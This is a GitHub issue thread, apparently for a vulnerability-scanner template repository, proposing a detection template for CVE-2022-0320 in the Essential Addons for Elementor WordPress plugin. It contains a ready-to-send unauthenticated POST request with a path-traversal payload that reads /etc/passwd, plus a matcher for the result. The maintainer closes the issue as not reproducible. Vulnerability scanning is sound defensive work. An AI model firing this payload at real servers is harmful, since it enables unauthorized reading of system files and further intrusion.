CVE-2022-0320
akincibor opened this issue · comments
akincibor.eth commented
id: CVE-2022-0320
info:
name: Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI
author: Akincibor
severity: critical
description: The plugin does not validate and sanitise some template data before it them in include statements, which could allow unauthenticated attackers to perform Local File Inclusion attack and read arbitrary files on the server, this could also lead to RCE via user uploaded files or other LFI to RCE techniques.
reference: https://wpscan.com/vulnerability/0d02b222-e672-4ac0-a1d4-d34e1ecf4a95
tags: wp,rce,unauth,lfi,wordpress
requests:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 396
Connection: close
action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd&template_info%5Bname%5D=Post-Grid
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
ertygiq commented
The .htaccess filename must be wrong. Looks like /etc/passwd was expected.
akincibor.eth commented
Yes you are right, updated.
Prince Chaddha commented
I am closing this Issue due to inactivity and the team not being able to reproduce the CVE in this template